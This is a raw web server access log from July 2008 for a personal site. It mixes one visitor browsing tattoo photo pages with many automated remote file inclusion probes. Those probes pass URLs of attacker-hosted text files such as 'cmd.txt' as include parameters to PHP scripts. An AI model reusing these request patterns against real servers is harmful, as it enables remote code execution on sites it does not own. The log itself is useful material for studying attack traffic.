74.55.113.226 - - [30/Jul/2008:19:02:01 -0500] "GET /logs/include/Classes.inc.php?tm_includepath=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
74.55.113.226 - - [30/Jul/2008:19:02:01 -0500] "GET /include/Classes.inc.php?tm_includepath=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
74.55.113.226 - - [30/Jul/2008:19:02:07 -0500] "GET /logs/include/Classes.inc.php?tm_includepath=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
74.55.113.226 - - [30/Jul/2008:19:02:07 -0500] "GET /include/Classes.inc.php?tm_includepath=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
205.134.252.10 - - [30/Jul/2008:19:02:08 -0500] "GET /logs/include/Classes.inc.php?tm_includepath=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
205.134.252.10 - - [30/Jul/2008:19:02:09 -0500] "GET /include/Classes.inc.php?tm_includepath=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
67.77.184.232 - - [30/Jul/2008:19:02:19 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.goldenfirstumc.org/sistem.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
67.77.184.232 - - [30/Jul/2008:19:02:25 -0500] "GET //skin/zero_vote/error.php?dir=http://www.goldenfirstumc.org/sistem.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
62.112.193.46 - - [30/Jul/2008:19:02:37 -0500] "GET /logs/include/status.inc.php?tm_includepath=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
62.112.193.46 - - [30/Jul/2008:19:02:38 -0500] "GET /include/status.inc.php?tm_includepath=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
200.146.61.130 - - [30/Jul/2008:19:02:40 -0500] "GET //index2.php?x=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
200.146.61.130 - - [30/Jul/2008:19:02:40 -0500] "GET /logs//index2.php?x=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
62.112.193.46 - - [30/Jul/2008:19:02:50 -0500] "GET /logs/include/statistic.inc.php?tm_includepath=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
62.112.193.46 - - [30/Jul/2008:19:02:50 -0500] "GET /include/statistic.inc.php?tm_includepath=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
62.112.193.46 - - [30/Jul/2008:19:02:51 -0500] "GET /logs/include/Classes.inc.php?tm_includepath=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
62.112.193.46 - - [30/Jul/2008:19:02:51 -0500] "GET /include/Classes.inc.php?tm_includepath=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
200.146.61.130 - - [30/Jul/2008:19:02:58 -0500] "GET //index2.php?x=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
200.146.61.130 - - [30/Jul/2008:19:02:58 -0500] "GET /logs//index2.php?x=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
70.85.201.66 - - [30/Jul/2008:19:03:12 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.811"
70.85.201.66 - - [30/Jul/2008:19:03:17 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
24.144.40.33 - - [30/Jul/2008:19:06:42 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://search.yahoo.com/search?p=bert+grimm+flash&fr=yfp-t-501&toggle=1&cop=mss&ei=UTF-8""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.144.40.33 - - [30/Jul/2008:19:06:42 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.144.40.33 - - [30/Jul/2008:19:06:42 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.144.40.33 - - [30/Jul/2008:19:06:43 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""-"
24.144.40.33 - - [30/Jul/2008:19:06:43 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""-"
24.144.40.33 - - [30/Jul/2008:19:06:47 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.144.40.33 - - [30/Jul/2008:19:06:47 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.144.40.33 - - [30/Jul/2008:19:06:47 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.144.40.33 - - [30/Jul/2008:19:06:47 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.144.40.33 - - [30/Jul/2008:19:06:48 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.144.40.33 - - [30/Jul/2008:19:06:48 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.144.40.33 - - [30/Jul/2008:19:06:48 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.144.40.33 - - [30/Jul/2008:19:06:48 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.144.40.33 - - [30/Jul/2008:19:06:48 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.144.40.33 - - [30/Jul/2008:19:06:48 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.144.40.33 - - [30/Jul/2008:19:06:48 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.144.40.33 - - [30/Jul/2008:19:06:49 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""-"
24.144.40.33 - - [30/Jul/2008:19:06:49 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""-"
24.144.40.33 - - [30/Jul/2008:19:07:01 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1762 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.144.40.33 - - [30/Jul/2008:19:07:02 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.144.40.33 - - [30/Jul/2008:19:07:02 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.144.40.33 - - [30/Jul/2008:19:07:02 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.144.40.33 - - [30/Jul/2008:19:07:02 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.144.40.33 - - [30/Jul/2008:19:07:02 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.144.40.33 - - [30/Jul/2008:19:07:03 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.144.40.33 - - [30/Jul/2008:19:07:03 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.144.40.33 - - [30/Jul/2008:19:07:04 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.144.40.33 - - [30/Jul/2008:19:07:04 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.144.40.33 - - [30/Jul/2008:19:07:04 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.144.40.33 - - [30/Jul/2008:19:07:06 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""-"
24.144.40.33 - - [30/Jul/2008:19:07:06 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""-"
74.220.163.9 - - [30/Jul/2008:19:07:11 -0500] "GET /logs//netcat/require/s_loadenv.inc.php?INCLUDE_FOLDER=http://www.hs-prutz.tsn.at/cache/id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
74.220.163.9 - - [30/Jul/2008:19:07:12 -0500] "GET //netcat/require/s_loadenv.inc.php?INCLUDE_FOLDER=http://www.hs-prutz.tsn.at/cache/id.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
24.144.40.33 - - [30/Jul/2008:19:07:14 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.144.40.33 - - [30/Jul/2008:19:07:14 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.144.40.33 - - [30/Jul/2008:19:07:14 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.144.40.33 - - [30/Jul/2008:19:07:16 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.144.40.33 - - [30/Jul/2008:19:07:17 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""-"
24.144.40.33 - - [30/Jul/2008:19:07:17 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""-"
24.144.40.33 - - [30/Jul/2008:19:07:21 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""-"
24.144.40.33 - - [30/Jul/2008:19:07:22 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""-"
24.144.40.33 - - [30/Jul/2008:19:07:22 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""-"
24.144.40.33 - - [30/Jul/2008:19:07:22 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""-"
24.144.40.33 - - [30/Jul/2008:19:07:23 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""-"
24.144.40.33 - - [30/Jul/2008:19:07:23 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""-"
74.55.113.226 - - [30/Jul/2008:19:07:24 -0500] "GET /logs/config/dbutil.bck.php?confdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
74.55.113.226 - - [30/Jul/2008:19:07:24 -0500] "GET /config/dbutil.bck.php?confdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
24.144.40.33 - - [30/Jul/2008:19:07:25 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""-"
24.144.40.33 - - [30/Jul/2008:19:07:25 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""-"
83.12.119.178 - - [30/Jul/2008:19:07:26 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
24.144.40.33 - - [30/Jul/2008:19:07:29 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.144.40.33 - - [30/Jul/2008:19:07:29 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""-"
24.144.40.33 - - [30/Jul/2008:19:07:29 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""-"
83.12.119.178 - - [30/Jul/2008:19:07:35 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
24.144.40.33 - - [30/Jul/2008:19:07:37 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""-"
24.144.40.33 - - [30/Jul/2008:19:07:38 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""-"
74.55.113.226 - - [30/Jul/2008:19:07:48 -0500] "GET /logs/include/status_top_x.inc.php?tm_includepath=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
74.55.113.226 - - [30/Jul/2008:19:07:48 -0500] "GET /include/status_top_x.inc.php?tm_includepath=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
74.55.113.226 - - [30/Jul/2008:19:07:49 -0500] "GET /logs/include/status_top_x.inc.php?tm_includepath=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
74.55.113.226 - - [30/Jul/2008:19:07:49 -0500] "GET /include/status_top_x.inc.php?tm_includepath=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
74.55.113.226 - - [30/Jul/2008:19:07:53 -0500] "GET /logs/config/dbutil.bck.php?confdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
74.55.113.226 - - [30/Jul/2008:19:07:53 -0500] "GET /config/dbutil.bck.php?confdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
205.134.252.10 - - [30/Jul/2008:19:07:55 -0500] "GET /logs/config/dbutil.bck.php?confdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
205.134.252.10 - - [30/Jul/2008:19:07:55 -0500] "GET /config/dbutil.bck.php?confdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
83.12.119.178 - - [30/Jul/2008:19:08:00 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
62.112.193.46 - - [30/Jul/2008:19:08:05 -0500] "GET /logs/include/status_top_x.inc.php?tm_includepath=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
62.112.193.46 - - [30/Jul/2008:19:08:05 -0500] "GET /include/status_top_x.inc.php?tm_includepath=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
62.112.193.46 - - [30/Jul/2008:19:08:09 -0500] "GET /logs/include/libchart-1.1/libchart.php?tm_includepath=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
83.12.119.178 - - [30/Jul/2008:19:08:09 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
62.112.193.46 - - [30/Jul/2008:19:08:09 -0500] "GET /include/libchart-1.1/libchart.php?tm_includepath=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
205.134.252.10 - - [30/Jul/2008:19:08:09 -0500] "GET /logs/include/status_top_x.inc.php?tm_includepath=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.810"
205.134.252.10 - - [30/Jul/2008:19:08:09 -0500] "GET /include/status_top_x.inc.php?tm_includepath=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
62.112.193.46 - - [30/Jul/2008:19:08:40 -0500] "GET /logs/config/dbutil.bck.php?confdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
62.112.193.46 - - [30/Jul/2008:19:08:41 -0500] "GET /config/dbutil.bck.php?confdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
74.55.113.226 - - [30/Jul/2008:19:08:49 -0500] "GET /logs/include/libchart-1.1/libchart.php?tm_includepath=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
74.55.113.226 - - [30/Jul/2008:19:08:49 -0500] "GET /include/libchart-1.1/libchart.php?tm_includepath=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
200.146.61.130 - - [30/Jul/2008:19:08:51 -0500] "GET /logs//home.php?action=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
200.146.61.130 - - [30/Jul/2008:19:08:51 -0500] "GET //home.php?action=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
74.55.113.226 - - [30/Jul/2008:19:08:55 -0500] "GET /logs/include/libchart-1.1/libchart.php?tm_includepath=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
74.55.113.226 - - [30/Jul/2008:19:08:55 -0500] "GET /include/libchart-1.1/libchart.php?tm_includepath=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
200.146.61.130 - - [30/Jul/2008:19:08:58 -0500] "GET /logs//home.php?action=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
205.134.252.10 - - [30/Jul/2008:19:09:16 -0500] "GET /logs/include/libchart-1.1/libchart.php?tm_includepath=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.810"
205.134.252.10 - - [30/Jul/2008:19:09:16 -0500] "GET /include/libchart-1.1/libchart.php?tm_includepath=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.810"
70.85.201.66 - - [30/Jul/2008:19:11:12 -0500] "GET /logs/index.php?MEMEK_ROOT=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
70.85.201.66 - - [30/Jul/2008:19:11:17 -0500] "GET /index.php?MEMEK_ROOT=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
63.208.74.34 - - [30/Jul/2008:19:11:19 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.goldenfirstumc.org/sistem.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
63.208.74.34 - - [30/Jul/2008:19:11:20 -0500] "GET //skin/zero_vote/error.php?dir=http://www.goldenfirstumc.org/sistem.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
70.85.201.66 - - [30/Jul/2008:19:12:20 -0500] "GET /logs/index.php?MEMEK_ROOT=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
63.208.74.34 - - [30/Jul/2008:19:12:23 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://69.13.92.203/sistem.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
63.208.74.34 - - [30/Jul/2008:19:12:24 -0500] "GET //skin/zero_vote/error.php?dir=http://69.13.92.203/sistem.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
70.85.201.66 - - [30/Jul/2008:19:12:25 -0500] "GET /index.php?MEMEK_ROOT=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
12.196.98.16 - - [30/Jul/2008:19:12:32 -0500] "GET /logs///accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 303 "-""libwww-perl/5.53"
12.196.98.16 - - [30/Jul/2008:19:12:36 -0500] "GET ///accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 298 "-""libwww-perl/5.53"
58.69.172.67 - - [30/Jul/2008:19:13:58 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.onconova.com/.../yyy??? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
58.69.172.67 - - [30/Jul/2008:19:13:59 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.onconova.com/.../yyy??? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
12.196.98.16 - - [30/Jul/2008:19:14:30 -0500] "GET /logs///accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 303 "-""libwww-perl/5.53"
12.196.98.16 - - [30/Jul/2008:19:14:33 -0500] "GET ///accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 298 "-""libwww-perl/5.53"
210.245.166.92 - - [30/Jul/2008:19:16:38 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://www.adoradores.kit.net/general? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
205.134.252.10 - - [30/Jul/2008:19:17:11 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
205.134.252.10 - - [30/Jul/2008:19:17:11 -0500] "GET //e404.php?DOCUMENT_ROOT=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
87.106.214.193 - - [30/Jul/2008:19:17:14 -0500] "GET /logs/include/Classes.inc.php?tm_includepath=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
87.106.214.193 - - [30/Jul/2008:19:17:14 -0500] "GET /include/Classes.inc.php?tm_includepath=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
85.10.128.148 - - [30/Jul/2008:19:18:10 -0500] "GET /logs/include/status.inc.php?tm_includepath=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
85.10.128.148 - - [30/Jul/2008:19:18:10 -0500] "GET /include/status.inc.php?tm_includepath=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
193.109.252.52 - - [30/Jul/2008:19:18:12 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.klaus-schumacher.de/cmd.txt?? HTTP/1.1" 200 93420 "-""libwww-perl/5.805"
193.109.252.52 - - [30/Jul/2008:19:18:12 -0500] "GET //?path%5Bdocroot%5D=http://www.klaus-schumacher.de/cmd.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
